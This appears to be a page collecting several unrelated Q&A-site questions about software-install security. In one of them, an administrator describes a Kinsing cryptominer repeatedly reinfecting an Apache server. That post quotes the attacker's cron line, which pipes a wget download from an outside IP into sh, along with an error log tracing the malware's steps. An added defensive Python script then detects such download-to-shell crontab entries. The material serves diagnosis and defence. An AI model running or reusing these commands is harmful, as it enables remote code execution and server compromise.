How detectable is malicious code run by programs that download and then install the main file?

There are many programs (free or otherwise) where the user is asked to download a small installer file, which may display the EULA to the user or do some other user registration, which then downloads the latest version of the main program (much larger, and often consists of many files) to install the software.

There are many instances where this is legitimate, and it seems to be popular with mainstream software packages like Adobe or Microsoft products, and it makes sense to use this approach to handle the installation of software. But if I download a 15MB installer for some audio processing program and scan it on VirusTotal, and it says nothing is detected, but then when I run it the program says it needs to download 150MB, it completely avoids the detection, doesn’t it?

The downloaded software may even be different each time, and likely will be because of version changes and updates.

So I should then scan the newly downloaded files before running them, shouldn’t I?

Is it common for programs to be set up so that they download a malicious file from a server and then run it within their own program? And does that get detected as malicious?

Theoretically, if you know the hash of a program one intends to install and you generate another file that hashes to that value, what could you do?

If I know the hash of a program you intend to install is d306c9f6c5…, if I generate some other file that hashes to that value, I could wreak all sorts of havoc. – from https://nakamoto.com/hash-functions/

A bitcoin miner is getting installed on my web server with the apache2 process

For a few weeks, someone, probably a bot, keeps installing a bitcoin miner on my server. I found it because it was taking all the CPU. The process name is kdevtmpfsi, located at /tmp/kdevtmpfsi; there’s a watchdog process kinsing located at /var/tmp/kinsing, and a cron job:

* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1 

I keep removing the traces above, but the attacker keeps re-injecting them, using the same exploit, which must be tied to the apache2 process because here’s what I find in my apache2 error log:

      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
      0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
    sh: 2: ulimit: error setting limit (Operation not permitted)
    rm: cannot remove '/var/log/syslog': Permission denied
    100 27434  100 27434    0     0  4465k      0 --:--:-- --:--:-- --:--:-- 4465k
    chattr: Permission denied while setting flags on /tmp/
    chattr: Permission denied while setting flags on /var/tmp/
    ERROR: You need to be root to run this script
    iptables v1.6.1: can't initialize iptables table `filter': Permission denied (you must be root)
    Perhaps iptables or your kernel needs to be upgraded.
    sudo: no tty present and no askpass program specified
    sh: 10: cannot create /proc/sys/kernel/nmi_watchdog: Permission denied
    sh: 11: cannot create /etc/sysctl.conf: Permission denied
    userdel: user 'akay' does not exist
    userdel: user 'vfinder' does not exist
    chattr: Permission denied while trying to stat /root/.ssh/
    chattr: Permission denied while trying to stat /root/.ssh/authorized_keys
    (Not all processes could be identified, non-owned process info
     will not be shown, you would have to be root to see it all.)
    grep: Trailing backslash
    grep: write error: Broken pipe
    kill: (56): Operation not permitted
    kill: (25879): No such process
    kill: (25886): No such process
    (Not all processes could be identified, non-owned process info
     will not be shown, you would have to be root to see it all.)
    pkill: killing pid 807 failed: Operation not permitted
    pkill: killing pid 836 failed: Operation not permitted
    pkill: killing pid 836 failed: Operation not permitted
    log_rot: no process found
    chattr: No such file or directory while trying to stat /etc/ld.so.preload
    rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
    rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
    rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
    rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
    rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
    rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
    rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
    rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
    rm: cannot remove '/var/tmp/lib': No such file or directory
    rm: cannot remove '/var/tmp/.lib': No such file or directory
    chattr: No such file or directory while trying to stat /tmp/lok
    chmod: cannot access '/tmp/lok': No such file or directory
    sh: 477: docker: not found
    sh: 478: docker: not found
    sh: 479: docker: not found
    sh: 480: docker: not found
    sh: 481: docker: not found
    sh: 482: docker: not found
    sh: 483: docker: not found
    sh: 484: docker: not found
    sh: 485: docker: not found
    sh: 486: docker: not found
    sh: 487: docker: not found
    sh: 488: docker: not found
    sh: 489: docker: not found
    sh: 490: docker: not found
    sh: 491: docker: not found
    sh: 492: docker: not found
    sh: 493: docker: not found
    sh: 494: docker: not found
    sh: 495: docker: not found
    sh: 496: docker: not found
    sh: 497: docker: not found
    sh: 498: docker: not found
    sh: 499: setenforce: not found
    sh: 500: cannot create /etc/selinux/config: Permission denied
    Failed to stop apparmor.service: Interactive authentication required.
    See system logs and 'systemctl status apparmor.service' for details.
    Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
    Executing: /lib/systemd/systemd-sysv-install disable apparmor
    Failed to reload daemon: Interactive authentication required.
    update-rc.d: error: Permission denied
    Failed to stop aliyun.service.service: Interactive authentication required.
    See system logs and 'systemctl status aliyun.service.service' for details.
    Failed to disable unit: Interactive authentication required.
    sh: echo: I/O error
    md5sum: /var/tmp/kinsing: No such file or directory
    sh: echo: I/O error
    sh: echo: I/O error
    --2020-01-10 19:03:30--  https://bitbucket.org/kondrongo12/git/raw/master/kinsing
    Resolving bitbucket.org (bitbucket.org)... 18.205.93.2, 18.205.93.1, 18.205.93.0, ...
    Connecting to bitbucket.org (bitbucket.org)|18.205.93.2|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 17072128 (16M) [application/octet-stream]
    Saving to: '/var/tmp/kinsing'

         0K .......... .......... .......... .......... ..........  0% 1.54M 11s
        50K .......... .......... .......... .......... ..........  0% 3.62M 7s
       100K .......... .......... .......... .......... ..........  0% 5.97M 6s
       150K .......... .......... .......... .......... ..........  1% 7.92M 5s
     16500K .......... .......... .......... .......... .......... 99% 11.5M 0s
     16550K .......... .......... .......... .......... .......... 99% 9.01M 0s
     16600K .......... .......... .......... .......... .......... 99% 11.3M 0s
     16650K .......... .......... ..                              100% 28.2M=1.5s

    2020-01-10 19:03:31 (10.8 MB/s) - '/var/tmp/kinsing' saved [17072128/17072128]

    sh: echo: I/O error
    sh: echo: I/O error

This is in the apache2 main error log file (/var/log/apache2/error.log) and not in my website’s error log, so I am thinking that it is not related to my PHP code. What should I do/check next?
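The cron entry quoted in this post (a download piped straight into a shell, scheduled every minute) is the persistence mechanism a defender should hunt for on every crontab. The following is an added example, not code from the post or its author: it scans crontab text for that pattern; the sample crontab is constructed, with its first entry reproducing the one from the post and the other entries being ordinary jobs that must not be flagged.

```python
import re
from typing import Dict, List

# Constructed sample crontab: the first entry reproduces the one quoted in the post,
# the others are benign jobs (example.invalid is a reserved, non-resolvable name).
SAMPLE_CRONTAB = """\
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL https://example.invalid/update.sh | bash
30 2 * * 0 /usr/local/bin/backup.sh
"""

# A download tool whose standard output is piped into a shell interpreter.
DOWNLOAD_TO_SHELL = re.compile(r"\b(wget|curl)\b[^|]*\|\s*(sh|bash|dash|zsh)\b")
# The "every minute" schedule the miner used to keep re-installing itself.
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")
URL = re.compile(r"https?://\S+")


def find_download_to_shell(crontab_text: str) -> List[Dict[str, object]]:
    """Return one finding per crontab entry that pipes downloaded content into a shell."""
    findings: List[Dict[str, object]] = []
    for lineno, raw in enumerate(crontab_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        if not DOWNLOAD_TO_SHELL.search(line):
            continue
        url = URL.search(line)
        findings.append({
            "line": lineno,
            "url": url.group(0) if url else None,
            "every_minute": bool(EVERY_MINUTE.match(line)),
            "entry": line,
        })
    return findings


if __name__ == "__main__":
    for f in find_download_to_shell(SAMPLE_CRONTAB):
        flag = " (runs every minute)" if f["every_minute"] else ""
        print(f"line {f['line']}: fetches {f['url']} and pipes it to a shell{flag}")
```

Feed it the output of `crontab -l` for each account (including www-data) and the files under /etc/cron.d to find the same entry wherever the script re-created it.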

Secure way to install Windows 10 and WinSCP, Notepad++, WAMP on a new laptop

I have a project with very critical information from business clients. I will buy a new laptop for this to manage/handle/analyze that information.

All I need is:

  • WAMP to run PHP scripts only on localhost

  • Notepad++ or another IDE

  • Chrome browser to access Gmail, Google Drive, Amazon AWS etc.

  • WinSCP to connect to an external server

Windows

So first about Windows 10. I can buy a laptop with Windows 10 Home preinstalled, or I can buy the FreeDOS version and install Windows 10 Pro. In the latter case I will need to download it from the Windows website and create a bootable USB on another laptop where Windows is already installed. I am not sure if there is any potential security risk that, in case the second computer is infected, it will also infect the USB?

Apps

I am not sure how I could omit any risk about WAMP, Notepad++, WinSCP. Yes, all of them are trusted apps, but you never know, right? So my question is, are these apps secure enough to be used in environments where security is extremely important? Are there any steps I should take once they are installed? Maybe once installed I should set up a proper firewall and disable any updates for them, and then just keep an eye on whether there are any security updates on their websites?

I may sound paranoid, but again the client information is very critical and the leak could result in big losses.

Install a PFX/SSL certificate downloaded from the server on an Android/iOS device in a React Native app?

I am building a React Native application that downloads an SSL certificate file or a PFX from the server or a remote file storage. After getting this file, I want to install this certificate onto the device so that only my app can access it. I want to use this certificate to facilitate secure API calls to another server that talks HTTPS. I am assuming that I should use the Keychain on iOS and Keystore on Android for storing the certificate but I am not sure if it enables me to store a PFX. And after storing it, how do I use it for the API calls that I make subsequently?

Too many pop-ups on driver install [on hold]

I am setting up a new build machine for my company’s software. We have 7 drivers, and previously on Windows 7 it would pop up once with “do you trust the company”, and if you clicked “always trust” and clicked yes it would install all 7 without any more pop-ups. With the new build from the new build machine it pops up and asks you separately for all 7 drivers, even if you click “always trust.” These pop-ups are very annoying and we would really like to get it back down to a single pop-up so as not to annoy our customers. The old build machine has a Symantec code signing certificate that is due to expire. I bought a new Sectigo code signing certificate for the build machine that is being used to sign the 7 drivers that are causing the pop-ups. Any idea what might have changed or what I could do to get it back down to a single pop-up? Thanks.